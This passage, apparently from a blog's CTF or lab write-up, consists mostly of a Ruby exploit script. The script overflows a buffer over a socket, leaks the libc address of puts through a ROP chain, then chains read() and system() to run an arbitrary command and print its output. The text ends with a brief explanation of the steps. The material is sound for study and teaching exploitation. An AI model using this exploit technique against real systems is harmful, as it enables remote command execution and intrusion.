welcome_str = read_until(s, 'enter!')
# Extract the number so we don't have to patch our binary anymore
welcome_str =~ /Enter ([0-9]+) char/
# Send the values it wants
s.write(('A' * $1.to_i) + "\n")
# Read the next prompt
read_until(s, 'name?')
# Build the same stack from the write-up
EXPLOIT = [
POP_RDI_RET, # Initial return address
PUTS_PLT_ENTRY, # rdi = addr of puts() to print
PUTS, # NEXT return address - actual puts()
MAIN, # End at MAIN
].pack('Q*') # pack('Q*'), in Ruby, means encode as 64-bit little endian integers
# Send our overflow + exploit + newline
s.write(("A" * 56) + EXPLOIT + "\n")
# The last thing that prints before our payload is the address of POP_EDI_RET,
# so read to that
read_until(s, "\x81\x12\x40")
# Then read to the newline right after the leak
out = read_until(s, "\x0a")
# Remove the newline
out.gsub!(/\x0a$/, '')
# Now we have our libc base address!
LIBC_BASE_ADDRESS = (out + "\x00\x00").unpack('Q').pop
puts
puts "LIBC base (ie, addr of puts): 0x%x" % LIBC_BASE_ADDRESS
puts
# Now we kinda start over! Except now we can use addresses from libc.so,
# relative to the address we determined
# Address of system()
SYSTEM = LIBC_BASE_ADDRESS - 0x2edf0
# Address of sleep() - for testing
SLEEP = LIBC_BASE_ADDRESS + 0x7e1d0
# Address of pop rsi / pop <something I don't care> / ret
# (Recall we need rsi for second arg)
POP_RSI_POP_R15_POP_RBP_RET = LIBC_BASE_ADDRESS + 0x1919a7
# Address of pop rdx / pop <something I don't care> / ret
# (Recall we need rdx for third arg)
POP_RDX_RET = 0x401283
# Address of read() function, for populating memory
READ = LIBC_BASE_ADDRESS + 0x89d60
# Some random memory in the .data section that we can use for temp storage
WRITABLE_MEMORY = LIBC_BASE_ADDRESS + 0x163f60
# Read the initial banner (again)
welcome_str = read_until(s, 'enter!')
# Extract the number so we don't have to patch our binary anymore
welcome_str =~ /Enter ([0-9]+) char/
# Send the values it wants
s.write(('A' * $1.to_i) + "\n")
# Read the next prompt
read_until(s, 'name?')
# Call sleep() to make sure it's working
# EXPLOIT2 = [
# POP_RDI_RET,
# 5,
# SLEEP,
# DEBUG
# ].pack('Q*')
EXPLOIT2 = [
# Set up a read() syscall to read arbitrary data into memory
# First argument = fd = 0 (read from stdin)
POP_RDI_RET,
0,
# Second arg = buffer = anywhere we can write
POP_RSI_POP_R15_POP_RBP_RET,
WRITABLE_MEMORY,
0x1337, # Doesn't matter (goes into r15)
0x1337, # Doesn't matter (goes into rbp)
# Third arg = size
POP_RDX_RET,
ARGV[0].length + 1,
# Return into READ - this will put our command into memory!
READ,
# Set up system() call to run the command
POP_RDI_RET,
WRITABLE_MEMORY,
# Return straight into SYSTEM
SYSTEM,
].pack('Q*')
s.write(("A" * 56) + EXPLOIT2 + "\n")
# Not sure if the sleep is necessary but it helps me feel better!
sleep 1
s.write("#{ARGV[0]}\0\n")
sleep 1
# Then just read everything
loop do
a = s.read(1)
if a.nil? || a == ''
exit
end
print a
end
In essence, that:
- ROPs into
puts
to get the libc address ofputs
- Reads that
- ROPs a second time into
read()
to get the command from stdin, then intosystem()
to run the command - Sends the command (which will be read)
- Reads everything else the socket sends
Good luck, and hope that makes sense!
Comments
Join the conversation on this Mastodon post (replies will appear below)!
Loading comments...